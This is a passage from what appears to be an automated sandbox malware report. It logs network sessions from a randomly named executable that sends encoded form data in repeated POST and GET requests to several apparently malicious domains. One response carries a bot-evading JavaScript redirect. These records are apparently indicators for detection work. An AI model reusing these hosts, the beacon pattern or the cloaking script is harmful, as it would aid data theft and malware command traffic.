                                                                Location: https://www.deefbank.net/1y6y/
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.649784142.250.185.115804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:36.628519058 CEST1720OUTPOST /1y6y/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.deefbank.net
                                                                Origin: http://www.deefbank.net
                                                                Referer: http://www.deefbank.net/1y6y/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 55 62 71 51 77 69 2b 6c 48 6c 61 2b 2b 62 4c 70 2b 2b 51 58 64 37 6a 6e 43 69 51 50 70 48 38 70 4f 4d 73 39 6e 39 5a 47 70 7a 33 48 64 61 4b 55 4f 6f 39 6d 75 64 39 6c 69 6b 42 70 45 62 59 48 76 38 30 6b 51 54 55 66 76 4a 59 59 67 6b 52 46 6d 39 31 51 4d 76 45 6b 71 2b 70 54 7a 74 76 6b 59 6e 6a 33 53 46 56 73 41 62 4b 42 63 42 53 68 69 4a 7a 68 6e 51 42 52 6c 36 70 62 53 62 5a 59 79 38 46 69 4b 38 74 54 4c 34 71 35 77 56 6e 4d 36 2f 78 39 49 66 53 43 64 64 69 69 58 70 4b 35 75 42 2f 56 37 68 4c 42 64 37 78 31 77 68 48 66 4d 7a 4e 6f 61 41 78 55 37 34 70 4a 69 45 32 72 6b 4e 73 32 5a 54 33 49 4d 34 68 74 56 56 67 56 6f 70 52 63 79 41 6d 57 33 75 65 56 61 76 6e 6b 5a 66 36 2b 67 51 4c 6f 72 5a 74 4d 45 45 30 35 6d 45 6a 77 36 6a 74 53 6f 62 58 41 6d 4e 68 43 49 79 67 64 69 30 63 52 43 79 50 30 47 52 4c 69 57 4b 6d 6c 61 6c 59 66 31 61 50 55 49 73 33 61 2f 42 47 5a 52 59 32 48 6b 79 73 61 37 6f 35 43 38 63 74 4e 76 46 71 74 39 6b 33 70 53 38 39 31 50 62 46 6c 7a 34 6c 35 4e 78 47 [TRUNCATED]
                                                                Data Ascii: i4fTbV=UbqQwi+lHla++bLp++QXd7jnCiQPpH8pOMs9n9ZGpz3HdaKUOo9mud9likBpEbYHv80kQTUfvJYYgkRFm91QMvEkq+pTztvkYnj3SFVsAbKBcBShiJzhnQBRl6pbSbZYy8FiK8tTL4q5wVnM6/x9IfSCddiiXpK5uB/V7hLBd7x1whHfMzNoaAxU74pJiE2rkNs2ZT3IM4htVVgVopRcyAmW3ueVavnkZf6+gQLorZtMEE05mEjw6jtSobXAmNhCIygdi0cRCyP0GRLiWKmlalYf1aPUIs3a/BGZRY2Hkysa7o5C8ctNvFqt9k3pS891PbFlz4l5NxG0gBzY2Vrl/9upyv3m18eSxnpgjljVblDLUnbrGmaaNUouhEvgfFmyHmD5MO+4q8TRlpPDHkiThp+QN7e/t/4tcTRlNaq0mSNDom0EMMtoKBLMVsclXgk/YtDjbww6X94U9pw2gd9T+xYhnsZiqZVyDDUCMj7TXD6DyTv8kM8MVzwVBjVhUOuqmX+RSH8bjUFwoel174zL7bTYpFSD/MLKHC2ic+EJPnsyRLNbN297R33KGbXOkAx7gxSdpKu0zRiaUxBIZc4XBtvpX84hM1CqOj2h5Vd549FOH3Ha0/jaTn1biTNncJrZtcESo9owty1TzTDvcK29Wy71BKFjhiAF6JQk6F59jG4kUl9mOYf0w+wvMeETkc/wpaFmUmoWNFfewFc6ycQMit5tRe9G0YrcdoTDZlgCmgnFQLOPcY2AIGvESu4vkXETRlsMgmUuNgyWBlKWt+YnGyzD87SHGpCKoDKb2zVBXG7OtgSRUYUEtpgpE40Jfs8QhAB6JE1lnvgQQwNO7x5owejDF2V7E3cYctErJk4JvwDzhWF4y0+klKggMkxyRYNP2GbeJ9V0Iy5UiZb55QvklOMZzkVWfaUfevk0CmWil3PLMxaDEnP3n1MvZrNtln/3y08Ky6+ouBCtX2/zIjS/OJU3PghssYrvk6viBJrl0vrOT [TRUNCATED]
                                                                Sep 22, 2024 17:44:37.366883039 CEST402INHTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:37 GMT
                                                                Location: https://www.deefbank.net/1y6y/
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.649786142.250.185.115804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:39.174176931 CEST420OUTGET /1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.deefbank.net
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:44:39.890641928 CEST557INHTTP/1.1 301 Moved Permanently
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sun, 22 Sep 2024 15:44:39 GMT
                                                                Location: https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU%3D&azq=fdKL
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                61192.168.2.649787172.81.61.22480
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:49.605087042 CEST423OUTGET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.moritynomxd.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:44:50.204298019 CEST728INHTTP/1.1 200 OK
                                                                Content-Type: text/html; charset=utf-8
                                                                X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                                X-Ratelimit-Limit: 500
                                                                X-Ratelimit-Remaining: 499
                                                                X-Ratelimit-Reset: 1727023490
                                                                Date: Sun, 22 Sep 2024 15:44:50 GMT
                                                                Content-Length: 458
                                                                Connection: close
                                                                Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                                                Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                62192.168.2.64978881.2.196.1980
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:55.243880033 CEST686OUTPOST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 42 45 6f 34 53 50 70 4f 44 4b 58 68 45 6e 68 4d 78 35 74 68 43 61 63 51 37 6e 2f 73 6a 44 55 30 2b 31 54 73 71 5a 51 73 35 71 6f 55
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIBEo4SPpODKXhEnhMx5thCacQ7n/sjDU0+1TsqZQs5qoU
                                                                Sep 22, 2024 17:44:55.907061100 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:55 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                63192.168.2.64978981.2.196.1980
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:57.789427042 CEST710OUTPOST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 5a 2f 7a 56 37 59 7a 4f 57 72 38 6b 6a 7a 73 6e 41 62 63 64 51 4d 50 30 4d 38 49 68 61 49 4d 45 6a 35 66 43 46 59 5a 6c 67 39 46 65 7a 6f 42 58 4a 48 6a 47 46 4e 33 47 64 67 7a 34 57 34 6d 43 72 32 6e 2b 4a 53 76 54 47 31 76 33 52 52 53 50 2f 4b 70 44 76 2f 45 2f 52 6a 79 74 71 7a 49 70 79 31 4b 79 42 6d 7a 44 63 31 55 6f 39 64 65 6b 48 67 71 55 7a 50 4d 59 58 56 2b 52 2b 73 73 53 34 54 53 49 78 67 57 74 4b 74 43 51 4b 38 53 37 6c 6e 65 6a 6a 55 65 38 31 72 73 34 4f 63 4c 32 65 4e 33 33 51 61 5a 66 31 58 39 74 54 49 35 71 67 6b 52 64 5a 48 7a 62 51 3d 3d
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993Z/zV7YzOWr8kjzsnAbcdQMP0M8IhaIMEj5fCFYZlg9FezoBXJHjGFN3Gdgz4W4mCr2n+JSvTG1v3RRSP/KpDv/E/RjytqzIpy1KyBmzDc1Uo9dekHgqUzPMYXV+R+ssS4TSIxgWtKtCQK8S7lnejjUe81rs4OcL2eN33QaZf1X9tTI5qgkRdZHzbQ==
                                                                Sep 22, 2024 17:44:58.484381914 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:58 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                64192.168.2.64979081.2.196.1980
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:45:00.338097095 CEST1723OUTPOST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 59 48 7a 56 4f 4d 7a 66 46 7a 38 6c 6a 7a 73 35 51 62 52 64 51 4d 65 30 50 4d 4d 68 61 45 32 45 68 78 66 44 6e 51 5a 30 46 42 46 51 7a 6f 42 49 35 47 6b 5a 56 4e 69 47 64 78 36 34 57 6f 6d 43 72 32 6e 2b 50 2b 76 44 6e 31 76 73 52 52 56 5a 76 4b 6c 4a 50 2b 62 2f 52 37 4d 74 71 6d 31 71 43 56 4b 78 6c 43 7a 42 75 74 55 67 39 64 59 6e 48 67 49 55 7a 54 44 59 58 4a 63 52 2b 5a 35 53 34 58 53 4e 56 73 42 2b 72 42 2f 43 4a 6f 7a 6f 6c 57 30 74 6c 6f 54 79 32 54 58 77 64 64 35 35 36 45 56 2b 6c 43 44 4b 46 47 43 67 43 70 54 6f 41 56 76 62 39 71 4b 46 66 7a 54 6c 72 70 4f 36 34 57 44 31 65 4f 48 32 68 51 51 39 37 30 71 32 6b 64 57 57 47 75 45 42 36 69 73 32 36 54 52 49 6a 59 7a 34 43 56 44 30 35 4b 49 2f 37 6f 77 50 79 2b 64 67 47 62 50 44 4a 61 61 54 72 57 44 49 75 33 45 34 49 7a 33 71 42 58 79 68 30 34 64 57 57 4c 77 48 4d 73 4b 58 42 62 37 6a 78 56 33 2b 39 43 [TRUNCATED]
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993YHzVOMzfFz8ljzs5QbRdQMe0PMMhaE2EhxfDnQZ0FBFQzoBI5GkZVNiGdx64WomCr2n+P+vDn1vsRRVZvKlJP+b/R7Mtqm1qCVKxlCzButUg9dYnHgIUzTDYXJcR+Z5S4XSNVsB+rB/CJozolW0tloTy2TXwdd556EV+lCDKFGCgCpToAVvb9qKFfzTlrpO64WD1eOH2hQQ970q2kdWWGuEB6is26TRIjYz4CVD05KI/7owPy+dgGbPDJaaTrWDIu3E4Iz3qBXyh04dWWLwHMsKXBb7jxV3+9C7tN6eWZVR4X57giDHJQl5UckydtBgQyohb+U0OEvIZKiEoDD2O9/NMrUl2MorL1qUpiHeAP0Wl0svpnfuyuG0yfLix3tKvRIgMpTOtY1kbDWcQTrMnXZSX6FojBM1E1HY7yE87Z3eqnFzby38VPOXi1ogGXqG3OLPmld3CRDcEdCSovA0ne36+61O+kouTvnEUpt8R+FmnB3FsUohJav/+hgIM6UJW5zdX01dy1685HySvd1nt2cavnjAGxL69pTr37+YOnNYXU8EjIGudq53aO8Z8VX096l6xW7HPRZ7EhYu+E/NFHriX+mzCN1wiW/OJh2Bgv43DOgalxrJT+9E4IJQ7MdA+gDgNKLo7ogvJP2kgDedwYEkmmjQYvMmISKtLjHMPeQHKOucKJLouONPKTi7sMZmmHHF/C1A/Zo+ZCydbA4cLKBh1EL+/SGqXYEmQaO/VMH11VKC4HvU0lLggLcMLmaEt0WM2ITCPgd28QOVp0pZbqQUzTL7vI1GH17R+diiVPDv7a/FMckVL//2AfPfzH94wRDkl36UOyTjXFTB3vXIYiQSuP1LMwrBKIWyLlDePv75P8IKSPy4+NWW/vK8m5+N2NuYpfk446wmS6ar9+T5JRRmfVT2oxkhUCE3xOynk2w3wZ/352XiD9ZHNQqld5vPwY5y1 [TRUNCATED]
                                                                Sep 22, 2024 17:45:01.051942110 CEST355INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:45:00 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                65192.168.2.64979181.2.196.1980
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:45:02.875157118 CEST421OUTGET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.kovallo.cloud
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:45:03.595550060 CEST691INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:45:03 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                66192.168.2.64979285.159.66.9380
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:45:08.628439903 CEST707OUTPOST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 42 7a 34 30 55 47 37 53 41 4f 6b 4b 69 4c 78 34 34 36 31 61 4e 71 36 64 6a 62 5a 2b 46 4b 4b 58 57 6e 44 43 4e 6d 46 76 52 63 4d 2b 37 72 50 78 67 51 42 47 48 34 78 58 76 46 33 75 2b 37 2b 33 45 61 55 6b 78 4e 53 49 75 2b 74 6b 69 58 32 4e 4a 64 78 57 76 79 69 72 55 39 45 6e 51 44 53 4e 72 36 47 59 43 45 6d 42 62 47 4f 66 78 4c 4c 45 30 43 39 68 38 44 59 52 65 65 33 68 73 51 39 6c 4a 41 7a 53 77 45 30 4f 68 34 71 5a 38 46 41 45 58 55 46 7a 49 75 4d 6a 68 32 30 2b 46 76 5a 65 2f 39 69 42 62 6c 66 64 37 58 64 6e 6b 6c 55 6c 79 59 70 6e 57 52 33 42 39 39 6d 63 53 41 63 6a
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pBz40UG7SAOkKiLx4461aNq6djbZ+FKKXWnDCNmFvRcM+7rPxgQBGH4xXvF3u+7+3EaUkxNSIu+tkiX2NJdxWvyirU9EnQDSNr6GYCEmBbGOfxLLE0C9h8DYRee3hsQ9lJAzSwE0Oh4qZ8FAEXUFzIuMjh20+FvZe/9iBblfd7XdnklUlyYpnWR3B99mcSAcj


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                67192.168.2.64979385.159.66.9380
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:45:11.173235893 CEST731OUTPOST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
